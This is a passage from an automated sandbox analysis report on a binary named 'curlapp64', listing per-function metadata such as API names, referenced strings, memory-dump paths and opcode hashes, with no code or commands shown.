                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CallEncodePointerTranslator
                                                                                                                                • String ID: MOC$RCC
                                                                                                                                • API String ID: 3544855599-2084237596
                                                                                                                                • Opcode ID: abb4ac20c0e7ee47166f1e2e729498332cb1ecb2cd888fb539b0de1d6272756d
                                                                                                                                • Instruction ID: 6341cbe431a0f1e5f6888346672a17abfb3d402543ec04aa805571f7930a02a9
                                                                                                                                • Opcode Fuzzy Hash: abb4ac20c0e7ee47166f1e2e729498332cb1ecb2cd888fb539b0de1d6272756d
                                                                                                                                • Instruction Fuzzy Hash: 4891D173A08B818AE750CF65E8642AC7BA0FB45789F1041BAEB8D87755DF3CD195C740
                                                                                                                                Function 00007FF6CABDA440 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 182COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task
                                                                                                                                • String ID: \printui.exe
                                                                                                                                • API String ID: 3936042273-2025757019
                                                                                                                                • Opcode ID: 90394b4a721abfce4623a459822bfdda1cc18a6cf456af26122fff8c654697fa
                                                                                                                                • Instruction ID: bfb9db18eda31db9765cf7d812a85a4b3444361730ad0ac2d25ace7c18231ccd
                                                                                                                                • Opcode Fuzzy Hash: 90394b4a721abfce4623a459822bfdda1cc18a6cf456af26122fff8c654697fa
                                                                                                                                • Instruction Fuzzy Hash: 1861F472F0968981EA109F65B46037977A0AB46FE1F184675EBED87BC9CE3CE481C700
                                                                                                                                Function 00007FF6CABDCE70 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 174COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                • String ID: false$true
                                                                                                                                • API String ID: 3668304517-2658103896
                                                                                                                                • Opcode ID: e705c6baa8a664ae6711b9ed81bc1c5cb4b02f73d7e74221b25eae945889d0f3
                                                                                                                                • Instruction ID: 26c6573ce91b43afa88a7c40af62b102f507c05f4726014a0269214996ed8ff9
                                                                                                                                • Opcode Fuzzy Hash: e705c6baa8a664ae6711b9ed81bc1c5cb4b02f73d7e74221b25eae945889d0f3
                                                                                                                                • Instruction Fuzzy Hash: 1661A062F09B4599EB008FB9E0603EC23B1AB867A9F444675DE9D67798DF38D449C340
                                                                                                                                Function 00007FF6CABB3D80 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 165COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __std_exception_destroy$_invalid_parameter_noinfo_noreturn
                                                                                                                                • String ID: [json.exception.
                                                                                                                                • API String ID: 2506729964-791563284
                                                                                                                                • Opcode ID: a15fe9e3dd0ab3612aafe936adf61db6a24d702351fdf8ab5c195f6f28f71eef
                                                                                                                                • Instruction ID: a8580528927397eb44e2b1d35a0e1e6ad5457ed33e19b7ef4c4d78c28915c0d5
                                                                                                                                • Opcode Fuzzy Hash: a15fe9e3dd0ab3612aafe936adf61db6a24d702351fdf8ab5c195f6f28f71eef
                                                                                                                                • Instruction Fuzzy Hash: 39510662B18B8182EB109F25F46036D67A1EF86BC1F444272EA9D47B8ADF7CE491C740
                                                                                                                                Function 00007FF6CABD21F0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 159COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                • String ID: false$true
                                                                                                                                • API String ID: 3668304517-2658103896
                                                                                                                                • Opcode ID: d1f43e0a9561315e58fe89bf7f55017164e3003eff9468595660d343122ae3eb
                                                                                                                                • Instruction ID: 80a02e52cf93f9a253882469ff91e63e2cbebedd1fbc1074a0fbc4b73545504a
                                                                                                                                • Opcode Fuzzy Hash: d1f43e0a9561315e58fe89bf7f55017164e3003eff9468595660d343122ae3eb
                                                                                                                                • Instruction Fuzzy Hash: 43618C32F09A8189FB14CF65E4603AC23B1AB46BA9F148675DE9D53BD9DF38D446C340
                                                                                                                                Function 00007FF6CABE5C40 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                • String ID: csm
                                                                                                                                • API String ID: 2395640692-1018135373
                                                                                                                                • Opcode ID: 728415faf017250e712976e96d38f2401c81adbe10c3a61a1a0af65f815d6fac
                                                                                                                                • Instruction ID: 0c7e5b4e83339cf7ae1c5aa6f753e1432a61b792baf42bdd3b12ea8d81c31ace
                                                                                                                                • Opcode Fuzzy Hash: 728415faf017250e712976e96d38f2401c81adbe10c3a61a1a0af65f815d6fac
                                                                                                                                • Instruction Fuzzy Hash: EA51D132B196028ADB14CF15F568A783791EB45B9AF1482B1DACEC7788DF7CE851C740
                                                                                                                                Function 00007FF6CABE7B74 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                • String ID: csm$csm
                                                                                                                                • API String ID: 3896166516-3733052814
                                                                                                                                • Opcode ID: 60447258ac59ea0ff9118befcd0d727b4e7c69a38ad0fbccb189498ca1fc1e7c
                                                                                                                                • Instruction ID: 7ba4501933fbf9220c55362ca405249586d65b606e63b0144d0ba03d051a8d3b
                                                                                                                                • Opcode Fuzzy Hash: 60447258ac59ea0ff9118befcd0d727b4e7c69a38ad0fbccb189498ca1fc1e7c
                                                                                                                                • Instruction Fuzzy Hash: E851C07290824286EB648F25E46437877A4FB56B86F1481F5DACDC7B85CF3CE4A0C780
                                                                                                                                Function 00007FF6CABE7384 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CallEncodePointerTranslator
                                                                                                                                • String ID: MOC$RCC
                                                                                                                                • API String ID: 3544855599-2084237596
                                                                                                                                • Opcode ID: 7302add62414e905ea2cf4951209c3e106a3d14f419694475448abafcf62f820
                                                                                                                                • Instruction ID: 7e248ab20d67aa3171d885d37aebe23feeb771e71091b1c1c651622207348c9a
                                                                                                                                • Opcode Fuzzy Hash: 7302add62414e905ea2cf4951209c3e106a3d14f419694475448abafcf62f820
                                                                                                                                • Instruction Fuzzy Hash: 3B618D32908B8586DB209F15F4507AAB7A0FB86B95F0442B5EBDD83B95DF7CD190CB40
                                                                                                                                Function 00007FF6CABBC600 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 113COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                • String ID: bad locale name
                                                                                                                                • API String ID: 2775327233-1405518554
                                                                                                                                • Opcode ID: d720c89f65a672feaa7031293e96cebc7aca7cc0688f93d45d261ae42c30dc8e
                                                                                                                                • Instruction ID: 3f28dc8be97dbc996730a18dab606a60941fb0d9a845ad51d7cdf5a806a97835
                                                                                                                                • Opcode Fuzzy Hash: d720c89f65a672feaa7031293e96cebc7aca7cc0688f93d45d261ae42c30dc8e
                                                                                                                                • Instruction Fuzzy Hash: 2B416132B1AB4189EB14DF71F8A06EC2374EF46749F0805B4DA8D97A55DE38D521D384
                                                                                                                                Function 00007FF8BA243650 Relevance: 6.4, APIs: 5, Instructions: 134COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495227485.00007FF8BA241000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495209271.00007FF8BA240000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495250453.00007FF8BA24F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495279165.00007FF8BA257000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8ba240000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: memmove
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2162964266-0
                                                                                                                                • Opcode ID: 33f16466be6dc610e467b3971b1e27369afad50301fb7faa32c85e5fe2eeb4c8
                                                                                                                                • Instruction ID: c12bf1d30679036b259169d11f84c5156cba2455bffda653cc70a0bd8a6b354b
                                                                                                                                • Opcode Fuzzy Hash: 33f16466be6dc610e467b3971b1e27369afad50301fb7faa32c85e5fe2eeb4c8
                                                                                                                                • Instruction Fuzzy Hash: 4751F676A15B8283EB688F29D5803A973A0FB48F88F045275DF4D07B96DF39E5A0C740
                                                                                                                                Function 00007FF6CABF6568 Relevance: 6.3, APIs: 4, Instructions: 304fileCOMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2718003287-0
                                                                                                                                • Opcode ID: 3d4c0514e02d79f87365731d1de066cb527f8a32871e4b00af959242977b0b12
                                                                                                                                • Instruction ID: 95563855363aac15d319418f5ce35987fa2ff335851dd73f4215c00a8c5287db
                                                                                                                                • Opcode Fuzzy Hash: 3d4c0514e02d79f87365731d1de066cb527f8a32871e4b00af959242977b0b12
                                                                                                                                • Instruction Fuzzy Hash: 0AD1273AB1868689E710CFA5E8602EC37B1F746799B44417ACEDED7B89DE38D506C700
                                                                                                                                Function 00007FF8BA247A09 Relevance: 6.3, APIs: 1, Strings: 3, Instructions: 278COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495227485.00007FF8BA241000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495209271.00007FF8BA240000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495250453.00007FF8BA24F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495279165.00007FF8BA257000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8ba240000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $ $header crc mismatch
                                                                                                                                • API String ID: 0-4092041874
                                                                                                                                • Opcode ID: f3e859156d2f2df6e50947c2d61307279f2c89dfe3362d84fd54485fae15644e
                                                                                                                                • Instruction ID: 87577bb96700080f592d8b52b8404eee7e43ffa19671ed2f30410bacbe0b2076
                                                                                                                                • Opcode Fuzzy Hash: f3e859156d2f2df6e50947c2d61307279f2c89dfe3362d84fd54485fae15644e
                                                                                                                                • Instruction Fuzzy Hash: FAC18462E183D64BE7A58B1CC088B3E7AA9EF44B84F0655B8EF5E17690CF38D940D740
                                                                                                                                Function 00007FF6CABBB3E0 Relevance: 6.2, APIs: 4, Instructions: 215COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 73155330-0
                                                                                                                                • Opcode ID: 08b5c82cf7ef5729a976c2df018e29c9679d255f028ffdbdf2e76418c90e4b16
                                                                                                                                • Instruction ID: 7ee2772ce5729c94af3910dd6b4242dd18e168b0106f6dd1195143dff7f88c43
                                                                                                                                • Opcode Fuzzy Hash: 08b5c82cf7ef5729a976c2df018e29c9679d255f028ffdbdf2e76418c90e4b16
                                                                                                                                • Instruction Fuzzy Hash: 4671F062B0878685EE20AF12B5646B9A351BB0ABD1F584771DFAD8B7C6DE7CE441C300
                                                                                                                                Function 00007FF8BA245A30 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495227485.00007FF8BA241000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495209271.00007FF8BA240000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495250453.00007FF8BA24F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495279165.00007FF8BA257000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8ba240000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _lseeki64free
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 862710683-0
                                                                                                                                • Opcode ID: 50d2be553c71d21b494f3438860be55513b4cdd3f140773280a45a7753013158
                                                                                                                                • Instruction ID: 6ac9b815c37bd1c469f04518773e6f281236b109e1d0252b2ff19c3c32c23e0b
                                                                                                                                • Opcode Fuzzy Hash: 50d2be553c71d21b494f3438860be55513b4cdd3f140773280a45a7753013158
                                                                                                                                • Instruction Fuzzy Hash: 00512032A04B1686EB688F2CD54426877A2EB00FE8F644275CFAD06ADCCF39E855D740
                                                                                                                                Function 00007FF8BA246220 Relevance: 6.1, APIs: 4, Instructions: 118stringCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495227485.00007FF8BA241000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495209271.00007FF8BA240000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495250453.00007FF8BA24F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495279165.00007FF8BA257000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8ba240000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _errno_readmemmovestrerror
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 363002165-0
                                                                                                                                • Opcode ID: 41a8473564084a25a2f040861077a2681525299a8a440eaec916b733327ba6bc
                                                                                                                                • Instruction ID: ae02c0e1584238c6044b768f5aeef313d2b5ca7f74dba0aaf20c845f325afb77
                                                                                                                                • Opcode Fuzzy Hash: 41a8473564084a25a2f040861077a2681525299a8a440eaec916b733327ba6bc
                                                                                                                                • Instruction Fuzzy Hash: 2D419E32B086D387E7608E3D964022D6AE0BB44FE8F184271DF1E87794DF39E8869740
                                                                                                                                Function 00007FF8BA248094 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 103COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495227485.00007FF8BA241000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495209271.00007FF8BA240000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495250453.00007FF8BA24F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495279165.00007FF8BA257000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8ba240000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: memmove
                                                                                                                                • String ID: $ $invalid stored block lengths
                                                                                                                                • API String ID: 2162964266-1718185709
                                                                                                                                • Opcode ID: d0a3bdb81d83d4619764f4d3bcf6a6d0fbd8176f51e719e263f53f19bff28088
                                                                                                                                • Instruction ID: 842b0858a54e41371c6ade3d53bdb12143fc2baa0a280a16f09fe965fac4c76e
                                                                                                                                • Opcode Fuzzy Hash: d0a3bdb81d83d4619764f4d3bcf6a6d0fbd8176f51e719e263f53f19bff28088
                                                                                                                                • Instruction Fuzzy Hash: 69417F72A286968BE7658F19D488A7E3AEDFB44B80F114479DF4947780CF38E984DB40
                                                                                                                                Function 00007FF6CABD8D30 Relevance: 6.1, APIs: 4, Instructions: 100COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Module$FileHandleName
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4146042529-0
                                                                                                                                • Opcode ID: 80d56585cf3bb0cae7f4b05554e27583c43836ff64ba581ffbaeac8f1f8b774f
                                                                                                                                • Instruction ID: 2cafc0526ed31cd68ebed3c1f459a9ec1744c3f9a4a18e5de0d2531491de2aef
                                                                                                                                • Opcode Fuzzy Hash: 80d56585cf3bb0cae7f4b05554e27583c43836ff64ba581ffbaeac8f1f8b774f
                                                                                                                                • Instruction Fuzzy Hash: 3641E222E18B8281EB109FA1F8643AD6361FB967A5F500275DBDC93AD8DF78E190C340
                                                                                                                                Function 00007FF6CABEA37C Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                • Opcode ID: f16319243a80464280e95f1c086ea1042b7c5269695a3174b8d11ba6174b0bf2
                                                                                                                                • Instruction ID: f22b78c388704b289348877d4be83af917ef8f75c471759576799ace007b5312
                                                                                                                                • Opcode Fuzzy Hash: f16319243a80464280e95f1c086ea1042b7c5269695a3174b8d11ba6174b0bf2
                                                                                                                                • Instruction Fuzzy Hash: 3C41CF22908A8986E7528F21E8602BC7BF4EB47F46F49C0F5C6CD87386DE3C9855C352
                                                                                                                                Function 00007FF6CABE4810 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
